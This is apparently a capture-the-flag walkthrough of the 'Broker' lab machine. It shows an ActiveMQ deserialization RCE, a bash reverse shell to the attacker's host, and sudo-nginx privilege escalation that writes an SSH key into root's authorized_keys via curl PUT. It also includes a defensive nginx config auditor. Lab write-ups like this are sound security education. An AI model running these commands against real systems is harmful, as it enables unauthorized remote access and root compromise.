A Walkthrough of the Broker Machine
Enumeration
The IP address for the Broker machine during this walkthrough was 10.10.11.243
We can kick off our enumeration with an nmap scan.
nmap -sV -sC 10.10.11.243 -oN initial.nmap
We can see two ports open on the machine.
- Port 22: This is SSH, which means that if we obtain credentials we may be able to log in this way. This may be useful later.
- Port 80: This is an HTTP server. This is likely our entry point, so I will start here.
Navigating to the IP address in a browser presents us with a login prompt.
I attempted to log in with default and common credentials. The credentials Admin / Admin worked and allowed me to log in.
We can get the server version here as well.
The ActiveMQ service runs on an uncommon port, 61616. We can run a full port scan with nmap to find any other ports our quick scan may have missed.
nmap -sV -sC -p- 10.10.11.243 -oN fullPort.nmap
Here we can also see that the ActiveMQ version is 5.15.15. With the version information we can search for any known vulnerabilities associated with it.
Exploitation
Note: I tried several exploits before I found one that worked. The path below is the one that worked for me.
This vulnerability allows a threat actor to achieve Remote Code Execution (RCE) by manipulating serialized class types.
Using the CVE we can find the exploit below on GitHub.
This exploit makes the vulnerable server reach out to our attacking machine to fetch an XML file containing a reverse shell. The Proof of Concept (PoC) provided uses msfvenom to generate a Linux ELF payload. Instead, I will use a basic bash reverse shell. To avoid formatting issues I will base64-encode the payload.
echo "bash -i >& /dev/tcp/<YourIP>/<YourPort> 0>&1" | base64
Now we can put it into the XML file.
For the vulnerable server to download the XML file we need to host an HTTP server. I used python3 for convenience, but any web server would work.
python3 -m http.server 8000
We also need to start a netcat (nc) listener to receive the reverse shell.
nc -nvlp 8080
We can now run the script.
./ActiveMQ-RCE -i <VulnerableMachineIP> -u <URLtoTheXML>
If we check the listener we should have a connection back.
Privilege Escalation
If we run sudo -l we can see that the current user has sudo permission to run /usr/sbin/nginx. Because of this it may be possible to run an nginx server as root, which could then read and write files in the root user's directory.
I am not familiar with nginx configuration files but I was able to use a couple of different resources to put together a functioning configuration.
A couple of things to note: the config tells nginx to run as the root user, listen on port 8081 and serve the / directory. Autoindex is on so we can browse the file listing. The line dav_methods PUT; enables the PUT method.
The idea is that we first view the root directory to confirm the weakness, then attempt to PUT an SSH key into the root user's .ssh folder.
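As an added defensive check (not part of the original walkthrough), the following Python script audits an nginx configuration for the same directives described above, so an administrator can review any config file a low-privileged user is permitted to load through sudo. The sample config lines are constructed for this example.

```python
"""Audit an nginx configuration for directives that turn a root-run
server into a file read/write primitive (run as root, serve /, list
directories, accept PUT)."""
import re
from typing import List, Tuple

# directive -> (regex applied to its arguments, reason it is risky)
RISKY = {
    "user": (r"^root\b", "worker processes run as root"),
    "root": (r"^/$", "document root is the filesystem root"),
    "autoindex": (r"^on$", "directory listing exposes file names"),
    "dav_methods": (r"\bPUT\b", "PUT lets clients write files"),
}


def audit_nginx_conf(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, directive, reason) for every risky directive."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()  # strip comments and whitespace
        if not line.endswith(";"):
            continue  # block openers/closers and blank lines carry no directive
        parts = line[:-1].split()
        if not parts:
            continue
        directive, args = parts[0], " ".join(parts[1:])
        rule = RISKY.get(directive)
        if rule and re.search(rule[0], args):
            findings.append((lineno, directive, rule[1]))
    return findings


def is_hardened(text: str) -> bool:
    """True when no risky directive is present."""
    return not audit_nginx_conf(text)


# Constructed sample: the settings the walkthrough describes plus benign ones.
SAMPLE = """\
user root;
worker_processes 1;
autoindex on;   # directory listing
dav_methods PUT;
root /;
"""

if __name__ == "__main__":
    for lineno, directive, why in audit_nginx_conf(SAMPLE):
        print(f"line {lineno}: {directive} -> {why}")
```

Pair this with a review of sudoers entries: a rule that lets a user run nginx with an arbitrary -c file defeats any hardening of the system config itself.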
Using the python3 simple HTTP server we can move the config file over to the target machine. I saved it to the /tmp directory. Now we can host the server and see if it works.
sudo /usr/sbin/nginx -c /tmp/web.conf
A curl request can be made to view the page contents.
This works and we are able to view the root.txt file.
One step further
If you agree that it is not over until we have a root shell, we can go one step further. Since we enabled the PUT method, we can generate an SSH key pair and drop the public key in the root user's .ssh folder.
ssh-keygen
Curl can be used to upload the public key.
curl -X PUT http://<TargetIP>:8081/root/.ssh/authorized_keys -d '<YourSSHPublicKey>'
Once the file has been uploaded we can attempt to ssh to the machine.
ssh -i <YourSSHKey> root@<TargetIP>
We now have shell as root on the target box.
Thank you for joining me through this journey, I hope you had fun and learned something. Feel free to reach out to me if you have any questions. You can find me at the following links:
LinkedIn: https://www.linkedin.com/in/seth-mccoun-353669163
Twitter: https://twitter.com/seth_mccoun